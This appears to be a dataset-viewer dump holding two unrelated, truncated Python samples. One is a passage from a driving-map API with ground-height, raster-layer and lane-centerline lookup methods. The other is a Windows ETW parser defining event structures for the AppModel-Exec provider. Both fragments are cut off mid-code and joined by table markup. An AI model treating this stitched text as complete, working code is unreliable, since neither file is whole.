input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
np.ndarray, city_name: str) -> np.ndarray:
"""
Check whether each point is likely to be from the ground surface
Args:
point_cloud: Numpy array of shape (N,3)
city_name: either 'MIA' for Miami or 'PIT' for Pittsburgh
Returns:
is_ground_boolean_arr: Numpy array of shape (N,) where ith entry is True if the LiDAR return
is likely a hit from the ground surface.
"""
ground_height_values = self.get_ground_height_at_xy(point_cloud, city_name)
is_ground_boolean_arr = (np.absolute(point_cloud[:, 2] - ground_height_values) <= GROUND_HEIGHT_THRESHOLD) | (
np.array(point_cloud[:, 2] - ground_height_values) < 0
)
return is_ground_boolean_arr
def get_ground_height_at_xy(self, point_cloud: np.ndarray, city_name: str) -> np.ndarray:
"""
Get ground height for each of the xy location in point_cloud
Args:
point_cloud: Numpy array of shape (k,2) or (k,3)
city_name: either 'MIA' for Miami or 'PIT' for Pittsburgh
Returns:
ground_height_values: Numpy array of shape (k,)
"""
ground_height_mat, npyimage_to_city_se2_mat = self.get_rasterized_ground_height(city_name)
city_coords = np.round(point_cloud[:, :2]).astype(np.int64)
se2_rotation = npyimage_to_city_se2_mat[:2, :2]
se2_trans = npyimage_to_city_se2_mat[:2, 2]
npyimage_to_city_se2 = SE2(rotation=se2_rotation, translation=se2_trans)
npyimage_coords = npyimage_to_city_se2.transform_point_cloud(city_coords)
npyimage_coords = npyimage_coords.astype(np.int64)
ground_height_values = np.full((npyimage_coords.shape[0]), np.nan)
ind_valid_pts = (npyimage_coords[:, 1] < ground_height_mat.shape[0]) * (
npyimage_coords[:, 0] < ground_height_mat.shape[1]
)
ground_height_values[ind_valid_pts] = ground_height_mat[
npyimage_coords[ind_valid_pts, 1], npyimage_coords[ind_valid_pts, 0]
]
return ground_height_values
def append_height_to_2d_city_pt_cloud(self, pt_cloud_xy: np.ndarray, city_name: str) -> np.ndarray:
"""
Accept 2d point cloud in xy plane and return 3d point cloud (xyz)
Args:
pt_cloud_xy: Numpy array of shape (N,2)
city_name: either 'MIA' for Miami or 'PIT' for Pittsburgh
Returns:
pt_cloud_xyz: Numpy array of shape (N,3)
"""
pts_z = self.get_ground_height_at_xy(pt_cloud_xy, city_name)
return np.hstack([pt_cloud_xy, pts_z[:, np.newaxis]])
def get_raster_layer_points_boolean(self, point_cloud: np.ndarray, city_name: str, layer_name: str) -> np.ndarray:
"""
driveable area is "da"
Args:
point_cloud: Numpy array of shape (N,3)
city_name: either 'MIA' for Miami or 'PIT' for Pittsburgh
layer_name: indicating layer name, either "roi" or "driveable area"
Returns:
is_ground_boolean_arr: Numpy array of shape (N,) where ith entry is True if the LiDAR return
is likely a hit from the ground surface.
"""
if layer_name == "roi":
layer_raster_mat, npyimage_to_city_se2_mat = self.get_rasterized_roi(city_name)
elif layer_name == "driveable_area":
(
layer_raster_mat,
npyimage_to_city_se2_mat,
) = self.get_rasterized_driveable_area(city_name)
else:
raise ValueError("layer_name should be wither roi or driveable_area.")
city_coords = np.round(point_cloud[:, :2]).astype(np.int64)
se2_rotation = npyimage_to_city_se2_mat[:2, :2]
se2_trans = npyimage_to_city_se2_mat[:2, 2]
npyimage_to_city_se2 = SE2(rotation=se2_rotation, translation=se2_trans)
npyimage_coords = npyimage_to_city_se2.transform_point_cloud(city_coords)
npyimage_coords = npyimage_coords.astype(np.int64)
# index in at (x,y) locations, which are (y,x) in the image
layer_values = np.full((npyimage_coords.shape[0]), 0.0)
ind_valid_pts = (
(npyimage_coords[:, 1] > 0)
* (npyimage_coords[:, 1] < layer_raster_mat.shape[0])
* (npyimage_coords[:, 0] > 0)
* (npyimage_coords[:, 0] < layer_raster_mat.shape[1])
)
layer_values[ind_valid_pts] = layer_raster_mat[
npyimage_coords[ind_valid_pts, 1], npyimage_coords[ind_valid_pts, 0]
]
is_layer_boolean_arr = layer_values == 1.0
return is_layer_boolean_arr
def get_nearest_centerline(
self, query_xy_city_coords: np.ndarray, city_name: str, visualize: bool = False
) -> Tuple[LaneSegment, float, np.ndarray]:
"""
KD Tree with k-closest neighbors or a fixed radius search on the lane centroids
is unreliable since (1) there is highly variable density throughout the map and (2)
lane lengths differ enormously, meaning the centroid is not indicative of nearby points.
If no lanes are found with MAX_LABEL_DIST_TO_LANE, we increase the search radius.
A correct approach is to compare centerline-to-query point distances, e.g. as done
in Shapely. Instead of looping over all points, we precompute the bounding boxes of
each lane.
We use the closest_waypoint as our criterion. Using the smallest sum to waypoints
does not work in many cases with disproportionately shaped lane segments.
and then choose the lane centerline with the smallest sum of 3-5
closest waypoints.
Args:
query_xy_city_coords: Numpy array of shape (2,) representing xy position of query in city coordinates
city_name: either 'MIA' for Miami or 'PIT' for Pittsburgh
visualize:
Returns:
lane_object: Python dictionary with fields describing a lane.
Keys include: 'centerline', 'predecessor', 'successor', 'turn_direction',
'is_intersection', 'has_traffic_control', 'is_autonomous', 'is_routable'
conf: real-valued confidence. less than 0.85 is almost always unreliable
dense_centerline: numpy array
"""
query_x = query_xy_city_coords[0]
query_y = query_xy_city_coords[1]
lane_centerlines_dict = self.city_lane_centerlines_dict[city_name]
search_radius = MAX_LABEL_DIST_TO_LANE
while True:
nearby_lane_ids = self.get_lane_ids_in_xy_bbox(
query_x, query_y, city_name, query_search_range_manhattan=search_radius
)
if not nearby_lane_ids:
search_radius *= 2 # double search radius
else:
break
nearby_lane_objs = [lane_centerlines_dict[lane_id] for lane_id in nearby_lane_ids]
cache = lane_waypt_to_query_dist(query_xy_city_coords, nearby_lane_objs)
per_lane_dists, min_dist_nn_indices, dense_centerlines = cache
closest_lane_obj = nearby_lane_objs[min_dist_nn_indices[0]]
dense_centerline = dense_centerlines[min_dist_nn_indices[0]]
# estimate confidence
conf = 1.0 - (per_lane_dists.min() / OUT_OF_RANGE_LANE_DIST_THRESHOLD)
conf = max(0.0, conf) # clip to ensure positive value
if visualize:
# visualize dists to nearby centerlines
fig = plt.figure(figsize=(22.5, 8))
ax = fig.add_subplot(111)
(query_x, query_y) = query_xy_city_coords.squeeze()
ax.scatter([query_x], [query_y], 100, color="k", marker=".")
# make another plot now!
self.plot_nearby_halluc_lanes(ax, city_name, query_x, query_y)
for i, line in enumerate(dense_centerlines):
ax.plot(line[:, 0], line[:, 1], color="y")
ax.text(line[:, 0].mean(), line[:, 1].mean(), str(per_lane_dists[i]))
ax.axis("equal")
plt.show()
plt.close("all")
return closest_lane_obj, conf, dense_centerline
def get_lane_direction(
self, query_xy_city_coords: np.ndarray, city_name: str, visualize: bool = False
) -> Tuple[np.ndarray, float]:
"""
Get vector direction of the lane you're in.
We ignore the sparse version of the centerline that we could
trivially pull from lane_obj['centerline'].
Args:
query_xy_city_coords: Numpy array of shape (2,) representing (x,y) position in city coordinates
city_name: either 'MIA' for Miami or 'PIT' for Pittsburgh
visualize: to also visualize the result
Returns:
lane_dir_vector: Numpy array of shape (2,) representing the direction (as a vector) of the closest
lane to the provided position in city coordinates
conf: real-valued confidence. less than 0.85 is almost always unreliable
We have access to all of the following fields in "lane_obj":
'centerline', 'predecessor', 'successor', 'turn_direction',
'is_intersection', 'has_traffic_control'
"""
cache = self.get_nearest_centerline(query_xy_city_coords, city_name)
lane_obj, confidence, dense_centerline = cache
centerline = dense_centerline
waypoint_dists = np.linalg.norm(centerline - query_xy_city_coords, axis=1)
closest_waypt_indxs = np.argsort(waypoint_dists)[:2]
prev_waypoint_id = closest_waypt_indxs.min()
next_waypoint_id = closest_waypt_indxs.max()
prev_waypoint = centerline[prev_waypoint_id]
next_waypoint = centerline[next_waypoint_id]
lane_dir_vector = next_waypoint - prev_waypoint
if visualize:
plt.plot(centerline[:, 0], centerline[:, 1], color="y")
plt.scatter(
query_xy_city_coords[0],
query_xy_city_coords[1],
200,
marker=".",
color="b",
)
dx = lane_dir_vector[0] * 10
dy = lane_dir_vector[1] * 10
plt.arrow(
query_xy_city_coords[0],
query_xy_city_coords[1],
dx,
dy,
color="r",
width=0.3,
zorder=2,
)
centerline_length = centerline.shape[0]
for i in range(centerline_length):
plt.scatter(centerline[i, 0], centerline[i, 1], i / 5.0, marker=".", color="k")
plt.axis("equal")
plt.show()
plt.close("all")
return lane_dir_vector, confidence
def get_lane_ids_in_xy_bbox(
self,
query_x: float,
query_y: float,
city_name: str,
query_search_range_manhattan: float = 5.0,
) -> List[int]:
"""
Prune away all lane segments based on Manhattan distance. We vectorize this instead
of using a for-loop. Get all lane IDs within a bounding box in the xy plane.
This is a approximation of a bubble search for point-to-polygon distance.
The bounding boxes of small point clouds (lane centerline waypoints) are precomputed in the map.
We then can perform an efficient search based on manhattan distance search radius from a
given 2D query point.
We pre-assign lane segment IDs to indices inside a big lookup array, with precomputed
hallucinated lane polygon extents.
Args:
query_x: representing x coordinate of xy query location
query_y: representing y coordinate of xy query location
city_name: either 'MIA' for Miami or 'PIT' for Pittsburgh
query_search_range_manhattan: search radius along axes
Returns:
lane_ids: lane segment IDs that live within a bubble
"""
query_min_x = query_x - query_search_range_manhattan
query_max_x = query_x + query_search_range_manhattan
query_min_y = query_y - query_search_range_manhattan
query_max_y = query_y + query_search_range_manhattan
overlap_indxs = find_all_polygon_bboxes_overlapping_query_bbox(
self.city_halluc_bbox_table[city_name],
np.array([query_min_x, query_min_y, query_max_x, query_max_y]),
)
if len(overlap_indxs) == 0:
return []
neighborhood_lane_ids: List[int] = []
for overlap_idx in overlap_indxs:
lane_segment_id = self.city_halluc_tableidx_to_laneid_map[city_name][str(overlap_idx)]
neighborhood_lane_ids.append(lane_segment_id)
return neighborhood_lane_ids
def get_lane_segment_predecessor_ids(self, lane_segment_id: int, city_name: str) -> List[int]:
"""
Get land id for the lane predecessor of the specified lane_segment_id
Args:
lane_segment_id: unique identifier for a lane segment within a city
city_name: either 'MIA' for Miami or 'PIT' for Pittsburgh
Returns:
predecessor_ids: list of integers, representing lane segment IDs of predecessors
"""
predecessor_ids = self.city_lane_centerlines_dict[city_name][lane_segment_id].predecessors
return predecessor_ids
def get_lane_segment_successor_ids(self, lane_segment_id: int, city_name: str) -> Optional[List[int]]:
"""
Get land id for the lane sucessor of the specified lane_segment_id
Args:
lane_segment_id: unique identifier for a lane segment within a city
city_name: either 'MIA' or 'PIT' for Miami or Pittsburgh
Returns:
successor_ids: list of integers, representing lane segment IDs of successors
"""
successor_ids = self.city_lane_centerlines_dict[city_name][lane_segment_id].successors
return successor_ids
def get_lane_segment_adjacent_ids(self, lane_segment_id: int, city_name: str) -> List[Optional[int]]:
"""
Get land id for the lane adjacent left/right neighbor of the specified lane_segment_id
Args:
lane_segment_id: unique identifier | |
# -*- coding: utf-8 -*-
"""
Microsoft-Windows-AppModel-Exec
GUID : eb65a492-86c0-406a-bace-9912d595bd69
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=100, version=0)
class Microsoft_Windows_AppModel_Exec_100_0(Etw):
pattern = Struct(
"PsmKey" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=101, version=0)
class Microsoft_Windows_AppModel_Exec_101_0(Etw):
pattern = Struct(
"PsmKey" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=102, version=0)
class Microsoft_Windows_AppModel_Exec_102_0(Etw):
pattern = Struct(
"PsmKey" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=103, version=0)
class Microsoft_Windows_AppModel_Exec_103_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"AppPsmKey" / WString,
"State" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=104, version=0)
class Microsoft_Windows_AppModel_Exec_104_0(Etw):
pattern = Struct(
"Removal" / Int8ul,
"SrcPsmKey" / WString,
"TargetPsmKey" / WString,
"Type" / Int32ul,
"Error" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=105, version=0)
class Microsoft_Windows_AppModel_Exec_105_0(Etw):
pattern = Struct(
"ValueName" / WString,
"Time" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=107, version=0)
class Microsoft_Windows_AppModel_Exec_107_0(Etw):
pattern = Struct(
"HwndPointer" / Int64ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=108, version=0)
class Microsoft_Windows_AppModel_Exec_108_0(Etw):
pattern = Struct(
"HwndPointer" / Int64ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=109, version=0)
class Microsoft_Windows_AppModel_Exec_109_0(Etw):
pattern = Struct(
"PsmKey" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=110, version=0)
class Microsoft_Windows_AppModel_Exec_110_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"Bool" / Int8ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=111, version=0)
class Microsoft_Windows_AppModel_Exec_111_0(Etw):
pattern = Struct(
"Hwnd" / Int64ul,
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=112, version=0)
class Microsoft_Windows_AppModel_Exec_112_0(Etw):
pattern = Struct(
"AUMID" / WString,
"PID" / WString,
"Count" / Int64ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=113, version=0)
class Microsoft_Windows_AppModel_Exec_113_0(Etw):
pattern = Struct(
"AUMID" / WString,
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=114, version=0)
class Microsoft_Windows_AppModel_Exec_114_0(Etw):
pattern = Struct(
"PackageLevel" / Int8ul,
"ErrorCode" / Int32ul,
"Cookie" / Int64sl
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=115, version=0)
class Microsoft_Windows_AppModel_Exec_115_0(Etw):
pattern = Struct(
"AUMID" / WString,
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=116, version=0)
class Microsoft_Windows_AppModel_Exec_116_0(Etw):
pattern = Struct(
"PsmKey" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=117, version=0)
class Microsoft_Windows_AppModel_Exec_117_0(Etw):
pattern = Struct(
"AUMID" / WString,
"Bool1" / Int8ul,
"Bool2" / Int8ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=118, version=0)
class Microsoft_Windows_AppModel_Exec_118_0(Etw):
pattern = Struct(
"AUMID" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=119, version=0)
class Microsoft_Windows_AppModel_Exec_119_0(Etw):
pattern = Struct(
"AUMID" / WString,
"Flags" / Int32ul,
"Reason" / Int64sl
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=120, version=0)
class Microsoft_Windows_AppModel_Exec_120_0(Etw):
pattern = Struct(
"MaxTterminate" / Int8ul,
"AUMID" / WString,
"ErrorCode" / Int32ul,
"Reason" / Int64sl,
"Misbehaving" / Int8ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=121, version=0)
class Microsoft_Windows_AppModel_Exec_121_0(Etw):
pattern = Struct(
"AUMID" / WString,
"Flags" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=122, version=0)
class Microsoft_Windows_AppModel_Exec_122_0(Etw):
pattern = Struct(
"PlmFlags" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=123, version=0)
class Microsoft_Windows_AppModel_Exec_123_0(Etw):
pattern = Struct(
"AUMID" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=124, version=0)
class Microsoft_Windows_AppModel_Exec_124_0(Etw):
pattern = Struct(
"AUMID" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=125, version=0)
class Microsoft_Windows_AppModel_Exec_125_0(Etw):
pattern = Struct(
"ValueName" / WString,
"Time" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=126, version=0)
class Microsoft_Windows_AppModel_Exec_126_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=127, version=0)
class Microsoft_Windows_AppModel_Exec_127_0(Etw):
pattern = Struct(
"AUMID" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=128, version=0)
class Microsoft_Windows_AppModel_Exec_128_0(Etw):
pattern = Struct(
"PID" / Int32ul,
"ErrorCode" / Int32ul,
"PackageState" / Int64sl
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=129, version=0)
class Microsoft_Windows_AppModel_Exec_129_0(Etw):
pattern = Struct(
"AUMID" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=130, version=0)
class Microsoft_Windows_AppModel_Exec_130_0(Etw):
pattern = Struct(
"SuspendExemptionReason" / Int32ul,
"Priority" / Int32ul,
"PsmKey" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=131, version=0)
class Microsoft_Windows_AppModel_Exec_131_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"Priority" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=132, version=0)
class Microsoft_Windows_AppModel_Exec_132_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"Priority" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=133, version=0)
class Microsoft_Windows_AppModel_Exec_133_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"Priority" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=134, version=0)
class Microsoft_Windows_AppModel_Exec_134_0(Etw):
pattern = Struct(
"PsmKey" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=135, version=0)
class Microsoft_Windows_AppModel_Exec_135_0(Etw):
pattern = Struct(
"PsmKey" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=136, version=0)
class Microsoft_Windows_AppModel_Exec_136_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"Exemption" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=137, version=0)
class Microsoft_Windows_AppModel_Exec_137_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"Bool" / Int8ul,
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=138, version=0)
class Microsoft_Windows_AppModel_Exec_138_0(Etw):
pattern = Struct(
"PsmKey" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=140, version=0)
class Microsoft_Windows_AppModel_Exec_140_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"AUMID" / WString,
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=142, version=0)
class Microsoft_Windows_AppModel_Exec_142_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"TimeOut" / Int64sl
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=143, version=0)
class Microsoft_Windows_AppModel_Exec_143_0(Etw):
pattern = Struct(
"PackageFamilyName" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=144, version=0)
class Microsoft_Windows_AppModel_Exec_144_0(Etw):
pattern = Struct(
"PackageFamilyName" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=145, version=0)
class Microsoft_Windows_AppModel_Exec_145_0(Etw):
pattern = Struct(
"PackageFullName" / WString,
"Time" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=146, version=0)
class Microsoft_Windows_AppModel_Exec_146_0(Etw):
pattern = Struct(
"PackageFullName" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=147, version=0)
class Microsoft_Windows_AppModel_Exec_147_0(Etw):
pattern = Struct(
"PackageFullName" / WString,
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=148, version=0)
class Microsoft_Windows_AppModel_Exec_148_0(Etw):
pattern = Struct(
"PackageFullName" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=149, version=0)
class Microsoft_Windows_AppModel_Exec_149_0(Etw):
pattern = Struct(
"PackageFullName" / WString,
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=150, version=0)
class Microsoft_Windows_AppModel_Exec_150_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"Trigger" / Int32ul,
"Reason" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=151, version=0)
class Microsoft_Windows_AppModel_Exec_151_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"Trigger" / Int32ul,
"Reason" / Int32ul,
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=152, version=0)
class Microsoft_Windows_AppModel_Exec_152_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"Trigger" / Int32ul,
"Reason" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=153, version=0)
class Microsoft_Windows_AppModel_Exec_153_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"Trigger" / Int32ul,
"Reason" / Int32ul,
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=154, version=0)
class Microsoft_Windows_AppModel_Exec_154_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"Trigger" / Int32ul,
"Reason" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=155, version=0)
class Microsoft_Windows_AppModel_Exec_155_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"Trigger" / Int32ul,
"Reason" / Int32ul,
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=156, version=0)
class Microsoft_Windows_AppModel_Exec_156_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"Type" / Int32ul,
"Reason" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=157, version=0)
class Microsoft_Windows_AppModel_Exec_157_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"LogErrorCode" / Int32ul,
"TerminationErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=158, version=0)
class Microsoft_Windows_AppModel_Exec_158_0(Etw):
pattern = Struct(
"PackageFullName" / WString,
"Type" / Int32ul,
"Reason" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=159, version=0)
class Microsoft_Windows_AppModel_Exec_159_0(Etw):
pattern = Struct(
"PackageFullName" / WString,
"plmKnowsPackage" / Int8ul,
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=161, version=0)
class Microsoft_Windows_AppModel_Exec_161_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=162, version=0)
class Microsoft_Windows_AppModel_Exec_162_0(Etw):
pattern = Struct(
"PsmKey" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=164, version=0)
class Microsoft_Windows_AppModel_Exec_164_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=165, version=0)
class Microsoft_Windows_AppModel_Exec_165_0(Etw):
pattern = Struct(
"PidCount" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=166, version=0)
class Microsoft_Windows_AppModel_Exec_166_0(Etw):
pattern = Struct(
"StateSource" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=167, version=0)
class Microsoft_Windows_AppModel_Exec_167_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=168, version=0)
class Microsoft_Windows_AppModel_Exec_168_0(Etw):
pattern = Struct(
"AUMID" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=169, version=0)
class Microsoft_Windows_AppModel_Exec_169_0(Etw):
pattern = Struct(
"AUMID" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=170, version=0)
class Microsoft_Windows_AppModel_Exec_170_0(Etw):
pattern = Struct(
"PsmKey" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=171, version=0)
class Microsoft_Windows_AppModel_Exec_171_0(Etw):
pattern = Struct(
"PsmKey" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=172, version=0)
class Microsoft_Windows_AppModel_Exec_172_0(Etw):
pattern = Struct(
"PsmKey" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=173, version=0)
class Microsoft_Windows_AppModel_Exec_173_0(Etw):
pattern = Struct(
"PsmKey" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=174, version=0)
class Microsoft_Windows_AppModel_Exec_174_0(Etw):
pattern = Struct(
"PsmKey" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=175, version=0)
class Microsoft_Windows_AppModel_Exec_175_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=176, version=0)
class Microsoft_Windows_AppModel_Exec_176_0(Etw):
pattern = Struct(
"PsmKey" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=177, version=0)
class Microsoft_Windows_AppModel_Exec_177_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=178, version=0)
class Microsoft_Windows_AppModel_Exec_178_0(Etw):
pattern = Struct(
"CommandLine" / WString,
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=179, version=0)
class Microsoft_Windows_AppModel_Exec_179_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=180, version=0)
class Microsoft_Windows_AppModel_Exec_180_0(Etw):
pattern = Struct(
"PsmKey" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=181, version=0)
class Microsoft_Windows_AppModel_Exec_181_0(Etw):
pattern = Struct(
"PsmKey" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=182, version=0)
class Microsoft_Windows_AppModel_Exec_182_0(Etw):
pattern = Struct(
"AUMID" / WString,
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=183, version=0)
class Microsoft_Windows_AppModel_Exec_183_0(Etw):
pattern = Struct(
"AUMID" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=184, version=0)
class Microsoft_Windows_AppModel_Exec_184_0(Etw):
pattern = Struct(
"AUMID" / WString,
"Exemption" / Int64ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=185, version=0)
class Microsoft_Windows_AppModel_Exec_185_0(Etw):
pattern = Struct(
"AUMID" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=186, version=0)
class Microsoft_Windows_AppModel_Exec_186_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"State" / Int32ul,
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=187, version=0)
class Microsoft_Windows_AppModel_Exec_187_0(Etw):
pattern = Struct(
"PsmKey" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=188, version=0)
class Microsoft_Windows_AppModel_Exec_188_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=189, version=0)
class Microsoft_Windows_AppModel_Exec_189_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"State" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=190, version=0)
class Microsoft_Windows_AppModel_Exec_190_0(Etw):
pattern = Struct(
"PsmKey" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=191, version=0)
